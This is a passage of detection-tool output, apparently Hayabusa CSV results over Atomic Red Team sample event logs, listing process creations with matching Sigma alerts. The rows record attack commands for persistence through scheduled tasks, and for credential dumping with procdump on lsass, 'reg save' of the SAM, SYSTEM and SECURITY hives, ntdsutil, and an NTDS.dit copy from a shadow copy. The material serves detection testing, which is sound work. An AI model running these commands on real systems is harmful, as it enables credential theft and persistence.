powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,MavInject Process Injection,,rules/sigma/process_creation/win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management AT : Command: at 13:20 /interactive cmd : Path: C:\Windows\System32\at.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Interactive AT 
Job,,rules/sigma/process_creation/win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : 
Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a -c : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a Java : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent 
Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,PowerShell 
Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA1FA70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\sam sam : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam 
sam""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\system system : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\security security : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Renamed ProcDump,,rules/sigma/process_creation/win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Suspicious Use of Procdump,,rules/sigma/process_creation/win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,Usage of Sysinternals Tools,,rules/sigma/process_creation/process_creation_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Procdump 
Usage,,rules/sigma/process_creation/win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe create shadow /for=C: : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c 
""vssadmin.exe create shadow /for=C:""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 